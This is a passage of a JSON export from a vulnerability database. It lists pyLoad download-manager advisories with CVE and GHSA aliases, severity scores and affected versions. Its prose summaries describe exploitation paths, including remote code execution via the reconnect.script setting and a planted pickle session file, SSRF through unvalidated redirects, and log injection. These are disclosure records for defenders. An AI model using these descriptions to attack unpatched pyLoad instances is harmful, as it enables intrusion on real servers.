},{"vulnerability":"VCID-kz5g-9as8-g7aw"},{"vulnerability":"VCID-nukv-bju1-auht"},{"vulnerability":"VCID-r5mf-vf91-nfgs"},{"vulnerability":"VCID-rh3z-nqp8-eqfa"},{"vulnerability":"VCID-rynb-u84j-7khx"},{"vulnerability":"VCID-ucfj-9bwk-pbd8"},{"vulnerability":"VCID-uwgh-ppsz-jyhz"},{"vulnerability":"VCID-vfr2-7map-4bcp"},{"vulnerability":"VCID-wtub-vtcd-6uhc"},{"vulnerability":"VCID-x9sy-hcqs-pke5"},{"vulnerability":"VCID-xkag-9scb-bfhk"},{"vulnerability":"VCID-xmf5-aqjt-tfhp"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:pypi/pyload-ng@0.5.0b3.dev69"},{"url":"http://public2.vulnerablecode.io/api/packages/93074?format=json","purl":"pkg:pypi/pyload-ng@0.5.0b3.dev98","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-5tq7-5rr2-hke4"},{"vulnerability":"VC
ID-5v6x-k9wj-zybu"},{"vulnerability":"VCID-8hzh-53hk-6yaz"},{"vulnerability":"VCID-fygw-7zvj-h3d5"},{"vulnerability":"VCID-uwgh-ppsz-jyhz"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:pypi/pyload-ng@0.5.0b3.dev98"}],"aliases":["CVE-2026-40594","GHSA-mp82-fmj6-f22v","PYSEC-2026-125"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-rynb-u84j-7khx"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/61902?format=json","vulnerability_id":"VCID-ucfj-9bwk-pbd8","summary":"pyLoad is an open-source Download Manager written in pure Python. There is an open redirect vulnerability due to incorrect validation of input values when redirecting users after login. pyLoad is validating URLs via the `get_redirect_url` function when redirecting users at login. This vulnerability has been patched with commit fe94451.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2024-24808","reference_id":"","reference_type":"","scores":[{"value":"0.02357","scoring_system":"epss","scoring_elements":"0.85263","published_at":"2026-06-11T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2024-24808"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2024-24808","reference_id":"CVE-2024-24808","reference_type":"","scores":[{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2024-24808"},{"reference_url":"https://github.com/pyload/pyload/commit/fe94451dcc2be90b3889e2fd9d07b483c8a6dccd","reference_id":"fe94451dcc2be90b3889e2fd9d07b483c8a6dccd","reference_type":"","scores":[{"value":"4.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:N/A:N"},{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:
R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2024-02-06T16:57:09Z/"}],"url":"https://github.com/pyload/pyload/commit/fe94451dcc2be90b3889e2fd9d07b483c8a6dccd"},{"reference_url":"https://github.com/advisories/GHSA-g3cm-qg2v-2hj5","reference_id":"GHSA-g3cm-qg2v-2hj5","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-g3cm-qg2v-2hj5"},{"reference_url":"https://github.com/pyload/pyload/security/advisories/GHSA-g3cm-qg2v-2hj5","reference_id":"GHSA-g3cm-qg2v-2hj5","reference_type":"","scores":[{"value":"4.7","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:N/A:N"},{"value":"6.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:P/P:M/B:A/M:M/D:T/2024-02-06T16:57:09Z/"}],"url":"https://github.com/pyload/pyload/security/advisories/GHSA-g3cm-qg2v-2hj5"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/28763?format=json","purl":"pkg:pypi/pyload-ng@0.5.0b3.dev79","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1vbk-b2hr-tydh"},{"vulnerability":"VCID-37r9-s7me-ubf1"},{"vulnerability":"VCID-4e9n-1qw5-sucs"},{"vulnerability":"VCID-4u3t-ct2r-ykc3"},{"vulnerability":"VCID-5jgf-dcg2-w7ed"},{"vulnerability":"VCID-5tq7-5rr2-hke4"},{"vulnerability":"VCID-5v6x-k9wj-zybu"},{"vulnerability":"VCID-64ux-jb56-gub5"},{"vulnerability":"VCID-72ar-7tmw-ybcy"},{"vulnerability":"VCID-7uc5-ppjr-yqfj"},{"vulnerability":"VCID-865y-shjm-xqam"},{"vulnerability":"VCID-8hzh-53hk-6yaz"},{"vulnerability":"VCI
D-bby9-fzzw-myhs"},{"vulnerability":"VCID-bfu1-1u68-47bw"},{"vulnerability":"VCID-d7dw-6vnb-43a9"},{"vulnerability":"VCID-ekx7-75uk-f7h5"},{"vulnerability":"VCID-fygw-7zvj-h3d5"},{"vulnerability":"VCID-g4ak-155r-qufh"},{"vulnerability":"VCID-h7q7-gmbe-sbck"},{"vulnerability":"VCID-hcq5-zndz-uucx"},{"vulnerability":"VCID-jhhh-f1ff-1bfk"},{"vulnerability":"VCID-kjru-xrvh-1bad"},{"vulnerability":"VCID-kz5g-9as8-g7aw"},{"vulnerability":"VCID-nukv-bju1-auht"},{"vulnerability":"VCID-r5mf-vf91-nfgs"},{"vulnerability":"VCID-rynb-u84j-7khx"},{"vulnerability":"VCID-uwgh-ppsz-jyhz"},{"vulnerability":"VCID-vfr2-7map-4bcp"},{"vulnerability":"VCID-wtub-vtcd-6uhc"},{"vulnerability":"VCID-xmf5-aqjt-tfhp"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:pypi/pyload-ng@0.5.0b3.dev79"}],"aliases":["CVE-2024-24808","GHSA-g3cm-qg2v-2hj5"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-ucfj-9bwk-pbd8"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/67864?format=json","vulnerability_id":"VCID-uwgh-ppsz-jyhz","summary":"pyLoad is a free and open-source download manager written in Python. Prior to 0.5.0b3.dev100, pyload-ng WebUI returns full Python traceback details to clients on unhandled exceptions. Because /web/<path:filename> is reachable without authentication and renders attacker-controlled template names, an unauthenticated user can reliably trigger a server exception (for example by requesting a non-existent template) and receive internal stack traces in the HTTP response. 
This vulnerability is fixed in 0.5.0b3.dev100.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-44226","reference_id":"","reference_type":"","scores":[{"value":"0.00067","scoring_system":"epss","scoring_elements":"0.20838","published_at":"2026-06-11T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-44226"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-44226","reference_id":"","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-44226"},{"reference_url":"https://github.com/advisories/GHSA-c3gc-9pf2-84gg","reference_id":"GHSA-c3gc-9pf2-84gg","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-c3gc-9pf2-84gg"},{"reference_url":"https://github.com/pyload/pyload/security/advisories/GHSA-c3gc-9pf2-84gg","reference_id":"GHSA-c3gc-9pf2-84gg","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2026-05-11T18:26:38Z/"}],"url":"https://github.com/pyload/pyload/security/advisories/GHSA-c3gc-9pf2-84gg"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/41381?format=json","purl":"pkg:pypi/pyload-ng@0.5.0b3.dev100","is_vulnerable":false,"affected_by_vulnerabilities":[],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:pypi/pyload-ng@0.5.0b3.dev100"}],"aliases":["CVE-2026-44226","GHSA-c3gc-9pf2-84gg"],"risk_score":3.1,"exploitability":"0.5","weighted_s
everity":"6.2","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-uwgh-ppsz-jyhz"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/77995?format=json","vulnerability_id":"VCID-vfr2-7map-4bcp","summary":"pyLoad is a free and open-source download manager written in Python. From version 0.4.0 to before version 0.5.0b3.dev97, the set_config_value() API endpoint allows users with the non-admin SETTINGS permission to modify any configuration option without restriction. The reconnect.script config option controls a file path that is passed directly to subprocess.run() in the thread manager's reconnect logic. A SETTINGS user can set this to any executable file on the system, achieving Remote Code Execution. The only validation in set_config_value() is a hardcoded check for general.storage_folder — all other security-critical settings including reconnect.script are writable without any allowlist or path restriction. This issue has been patched in version 0.5.0b3.dev97.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-33509","reference_id":"","reference_type":"","scores":[{"value":"0.00113","scoring_system":"epss","scoring_elements":"0.29541","published_at":"2026-06-11T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-33509"},{"reference_url":"https://github.com/pyload/pyload/commit/f5e284fcdfeaf08436bb03e5fcf697aaac659d8b","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/pyload/pyload/commit/f5e284fcdfeaf08436bb03e5fcf697aaac659d8b"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-33509","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"g
eneric_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-33509"},{"reference_url":"https://github.com/pyload/pyload/security/advisories/GHSA-r7mc-x6x7-cqxx","reference_id":"GHSA-r7mc-x6x7-cqxx","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-03-26T19:33:56Z/"}],"url":"https://github.com/pyload/pyload/security/advisories/GHSA-r7mc-x6x7-cqxx"}],"fixed_packages":[],"aliases":["CVE-2026-33509","GHSA-r7mc-x6x7-cqxx"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-vfr2-7map-4bcp"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/71687?format=json","vulnerability_id":"VCID-wtub-vtcd-6uhc","summary":"pyLoad is a free and open-source download manager written in Python. In 0.5.0b3.dev96 and earlier, pyLoad has a server-side request forgery (SSRF) vulnerability. The fix for CVE-2026-33992 added IP validation to BaseDownloader.download() that checks the hostname of the initial download URL. However, pycurl is configured with FOLLOWLOCATION=1 and MAXREDIRS=10, causing it to automatically follow HTTP redirects. Redirect targets are never validated against the SSRF filter. 
An authenticated user with ADD permission can bypass the SSRF fix by submitting a URL that redirects to an internal address.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35459","reference_id":"","reference_type":"","scores":[{"value":"0.00043","scoring_system":"epss","scoring_elements":"0.13369","published_at":"2026-06-11T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35459"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-33992","reference_id":"","reference_type":"","scores":[{"value":"9.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:H/SI:H/SA:N"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-33992"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35459","reference_id":"","reference_type":"","scores":[{"value":"9.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:H/SI:H/SA:N"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35459"},{"reference_url":"https://github.com/pyload/pyload/commit/33c55da084320430edfd941b60e3da0eb1be9443","reference_id":"33c55da084320430edfd941b60e3da0eb1be9443","reference_type":"","scores":[{"value":"9.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N"},{"value":"9.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:H/SI:H/SA:N"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2026-04-07T19:26:41Z/"}],"url":"https://github.com/pyload/pyload/commit/33c55da084320430edfd941b60e3da0eb1be9443"},{"reference_url":"https://github.com/advisories/GHSA-7gvf-3w72-p2pg","reference_id":"GHSA-7gv
f-3w72-p2pg","reference_type":"","scores":[{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-7gvf-3w72-p2pg"},{"reference_url":"https://github.com/pyload/pyload/security/advisories/GHSA-7gvf-3w72-p2pg","reference_id":"GHSA-7gvf-3w72-p2pg","reference_type":"","scores":[{"value":"9.1","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:N"},{"value":"CRITICAL","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"9.3","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:N/SC:H/SI:H/SA:N"},{"value":"CRITICAL","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:T/P:M/B:A/M:M/D:R/2026-04-07T19:26:41Z/"}],"url":"https://github.com/pyload/pyload/security/advisories/GHSA-7gvf-3w72-p2pg"}],"fixed_packages":[],"aliases":["CVE-2026-35459","GHSA-7gvf-3w72-p2pg"],"risk_score":4.5,"exploitability":"0.5","weighted_severity":"9.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-wtub-vtcd-6uhc"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/360742?format=json","vulnerability_id":"VCID-x9sy-hcqs-pke5","summary":"Duplicate Advisory: GHSA-x698-5hjm-w2m5\n### Duplicate Advisory\nThis advisory has been withdrawn because it is a duplicate of GHSA-x698-5hjm-w2m5. 
This link is maintained to preserve external references.\n\n### Original Description\nAny unauthenticated attacker can bypass the localhost \nrestrictions posed by the application and utilize this to create \narbitrary packages","references":[{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2025-7346","reference_id":"","reference_type":"","scores":[{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2025-7346"},{"reference_url":"https://github.com/advisories/GHSA-2wcm-vx67-3x4q","reference_id":"GHSA-2wcm-vx67-3x4q","reference_type":"","scores":[],"url":"https://github.com/advisories/GHSA-2wcm-vx67-3x4q"},{"reference_url":"https://github.com/pyload/pyload/security/advisories/GHSA-x698-5hjm-w2m5","reference_id":"GHSA-x698-5hjm-w2m5","reference_type":"","scores":[{"value":"8.7","scoring_system":"cvssv4","scoring_elements":"CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:H/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://github.com/pyload/pyload/security/advisories/GHSA-x698-5hjm-w2m5"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/28454?format=json","purl":"pkg:pypi/pyload-ng@0.5.0b3.dev78","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1vbk-b2hr-tydh"},{"vulnerability":"VCID-37r9-s7me-ubf1"},{"vulnerability":"VCID-4e9n-1qw5-sucs"},{"vulnerability":"VCID-4u3t-ct2r-ykc3"},{"vulnerability":"VCID-5jgf-dcg2-w7ed"},{"vulnerability":"VCID-5tq7-5rr2-hke4"},{"vulnerability":"VCID-5v6x-k9wj-zybu"},{"vulnerability":"VCID-64ux-jb56-gub5"},{"vulnerability":
"VCID-72ar-7tmw-ybcy"},{"vulnerability":"VCID-7uc5-ppjr-yqfj"},{"vulnerability":"VCID-865y-shjm-xqam"},{"vulnerability":"VCID-8hzh-53hk-6yaz"},{"vulnerability":"VCID-bby9-fzzw-myhs"},{"vulnerability":"VCID-bfu1-1u68-47bw"},{"vulnerability":"VCID-d7dw-6vnb-43a9"},{"vulnerability":"VCID-ekx7-75uk-f7h5"},{"vulnerability":"VCID-fygw-7zvj-h3d5"},{"vulnerability":"VCID-g4ak-155r-qufh"},{"vulnerability":"VCID-h7q7-gmbe-sbck"},{"vulnerability":"VCID-hcq5-zndz-uucx"},{"vulnerability":"VCID-jhhh-f1ff-1bfk"},{"vulnerability":"VCID-kjru-xrvh-1bad"},{"vulnerability":"VCID-kz5g-9as8-g7aw"},{"vulnerability":"VCID-nukv-bju1-auht"},{"vulnerability":"VCID-r5mf-vf91-nfgs"},{"vulnerability":"VCID-rynb-u84j-7khx"},{"vulnerability":"VCID-ucfj-9bwk-pbd8"},{"vulnerability":"VCID-uwgh-ppsz-jyhz"},{"vulnerability":"VCID-vfr2-7map-4bcp"},{"vulnerability":"VCID-wtub-vtcd-6uhc"},{"vulnerability":"VCID-xmf5-aqjt-tfhp"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:pypi/pyload-ng@0.5.0b3.dev78"}],"aliases":["GHSA-2wcm-vx67-3x4q"],"risk_score":4.0,"exploitability":"0.5","weighted_severity":"8.0","resource_url":"http://public2.vulnerablecode.io/vulnerabilities/VCID-x9sy-hcqs-pke5"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/48780?format=json","vulnerability_id":"VCID-xkag-9scb-bfhk","summary":"pyLoad is the free and open-source Download Manager written in pure Python. A log injection vulnerability was identified in `pyload` allowing any unauthenticated actor to inject arbitrary messages into the logs gathered by `pyload`. Forged or otherwise, corrupted log files can be used to cover an attacker’s tracks or even to implicate another party in the commission of a malicious act. 
This vulnerability has been patched in version 0.5.0b3.dev77.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2024-21645","reference_id":"","reference_type":"","scores":[{"value":"0.69097","scoring_system":"epss","scoring_elements":"0.98657","published_at":"2026-06-11T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2024-21645"},{"reference_url":"https://github.com/pyload/pyload/commit/4159a1191ec4fe6d927e57a9c4bb8f54e16c381d","reference_id":"4159a1191ec4fe6d927e57a9c4bb8f54e16c381d","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2024-01-17T21:13:17Z/"}],"url":"https://github.com/pyload/pyload/commit/4159a1191ec4fe6d927e57a9c4bb8f54e16c381d"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2024-21645","reference_id":"CVE-2024-21645","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N"},{"value":"MODERATE","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2024-21645"},{"reference_url":"https://github.com/advisories/GHSA-ghmw-rwh8-6qmr","reference_id":"GHSA-ghmw-rwh8-6qmr","reference_type":"","scores":[{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""}],"url":"https://github.com/advisories/GHSA-ghmw-rwh8-6qmr"},{"reference_url":"https://github.com/pyload/pyload/security/advisories/GHSA-ghmw-rwh8-6qmr","reference_id":"GHSA-ghmw-rwh8-6qmr","reference_type":"","scores":[{"value":"5.3","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N"},{"value":"MODERATE","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"MODERATE","scoring_system":"generic_textua
l","scoring_elements":""},{"value":"Track","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:Y/T:P/P:M/B:A/M:M/D:T/2024-01-17T21:13:17Z/"}],"url":"https://github.com/pyload/pyload/security/advisories/GHSA-ghmw-rwh8-6qmr"}],"fixed_packages":[{"url":"http://public2.vulnerablecode.io/api/packages/28288?format=json","purl":"pkg:pypi/pyload-ng@0.5.0b3.dev77","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-1vbk-b2hr-tydh"},{"vulnerability":"VCID-37r9-s7me-ubf1"},{"vulnerability":"VCID-4e9n-1qw5-sucs"},{"vulnerability":"VCID-4u3t-ct2r-ykc3"},{"vulnerability":"VCID-5jgf-dcg2-w7ed"},{"vulnerability":"VCID-5tq7-5rr2-hke4"},{"vulnerability":"VCID-5v6x-k9wj-zybu"},{"vulnerability":"VCID-64ux-jb56-gub5"},{"vulnerability":"VCID-72ar-7tmw-ybcy"},{"vulnerability":"VCID-7uc5-ppjr-yqfj"},{"vulnerability":"VCID-865y-shjm-xqam"},{"vulnerability":"VCID-8hzh-53hk-6yaz"},{"vulnerability":"VCID-bby9-fzzw-myhs"},{"vulnerability":"VCID-bfu1-1u68-47bw"},{"vulnerability":"VCID-d7dw-6vnb-43a9"},{"vulnerability":"VCID-ekx7-75uk-f7h5"},{"vulnerability":"VCID-fygw-7zvj-h3d5"},{"vulnerability":"VCID-g4ak-155r-qufh"},{"vulnerability":"VCID-h7q7-gmbe-sbck"},{"vulnerability":"VCID-hcq5-zndz-uucx"},{"vulnerability":"VCID-jhhh-f1ff-1bfk"},{"vulnerability":"VCID-kjru-xrvh-1bad"},{"vulnerability":"VCID-kz5g-9as8-g7aw"},{"vulnerability":"VCID-nukv-bju1-auht"},{"vulnerability":"VCID-r5mf-vf91-nfgs"},{"vulnerability":"VCID-rh3z-nqp8-eqfa"},{"vulnerability":"VCID-rynb-u84j-7khx"},{"vulnerability":"VCID-ucfj-9bwk-pbd8"},{"vulnerability":"VCID-uwgh-ppsz-jyhz"},{"vulnerability":"VCID-vfr2-7map-4bcp"},{"vulnerability":"VCID-wtub-vtcd-6uhc"},{"vulnerability":"VCID-x9sy-hcqs-pke5"},{"vulnerability":"VCID-xmf5-aqjt-tfhp"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:pypi/pyload-ng@0.5.0b3.dev77"}],"aliases":["CVE-2024-21645","GHSA-ghmw-rwh8-6qmr"],"risk_score":3.1,"exploitability":"0.5","weighted_severity":"6.2","resource_url":"http://public2.vulnerablecode.io/vuln
erabilities/VCID-xkag-9scb-bfhk"},{"url":"http://public2.vulnerablecode.io/api/vulnerabilities/71594?format=json","vulnerability_id":"VCID-xmf5-aqjt-tfhp","summary":"pyLoad is a free and open-source download manager written in Python. The fix for CVE-2026-33509 added an ADMIN_ONLY_OPTIONS set to block non-admin users from modifying security-critical config options. The storage_folder option is not in this set and passes the existing path restriction because the Flask session directory is outside both PKGDIR and userdir. A user with SETTINGS and ADD permissions can redirect downloads to the Flask filesystem session store, plant a malicious pickle payload as a predictable session file, and trigger arbitrary code execution when any HTTP request arrives with the corresponding session cookie. This vulnerability is fixed with commit c4cf995a2803bdbe388addfc2b0f323277efc0e1.","references":[{"reference_url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35464","reference_id":"","reference_type":"","scores":[{"value":"0.00076","scoring_system":"epss","scoring_elements":"0.22848","published_at":"2026-06-11T12:55:00Z"}],"url":"https://api.first.org/data/v1/epss?cve=CVE-2026-35464"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-33509","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-33509"},{"reference_url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35464","reference_id":"","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""}],"url":"https://nvd.nist.gov/vuln/detail/CVE-2026-35464"},{"reference_url":"https://github.com/pyload/pyload/commit/c4cf995a2803bdbe388addfc2b0f323277ef
c0e1","reference_id":"c4cf995a2803bdbe388addfc2b0f323277efc0e1","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-04-07T15:12:26Z/"}],"url":"https://github.com/pyload/pyload/commit/c4cf995a2803bdbe388addfc2b0f323277efc0e1"},{"reference_url":"https://www.cve.org/CVERecord?id=CVE-2026-33509","reference_id":"CVERecord?id=CVE-2026-33509","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-04-07T15:12:26Z/"}],"url":"https://www.cve.org/CVERecord?id=CVE-2026-33509"},{"reference_url":"https://github.com/pyload/pyload/security/advisories/GHSA-4744-96p5-mp2j","reference_id":"GHSA-4744-96p5-mp2j","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/I:H/A:H"},{"value":"HIGH","scoring_system":"cvssv3.1_qr","scoring_elements":""},{"value":"HIGH","scoring_system":"generic_textual","scoring_elements":""},{"value":"Track*","scoring_system":"ssvc","scoring_elements":"SSVCv2/E:P/A:N/T:T/P:M/B:A/M:M/D:R/2026-04-07T15:12:26Z/"}],"url":"https://github.com/pyload/pyload/security/advisories/GHSA-4744-96p5-mp2j"},{"reference_url":"https://github.com/pyload/pyload/security/advisories/GHSA-r7mc-x6x7-cqxx","reference_id":"GHSA-r7mc-x6x7-cqxx","reference_type":"","scores":[{"value":"7.5","scoring_system":"cvssv3.1","scoring_elements":"CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:H/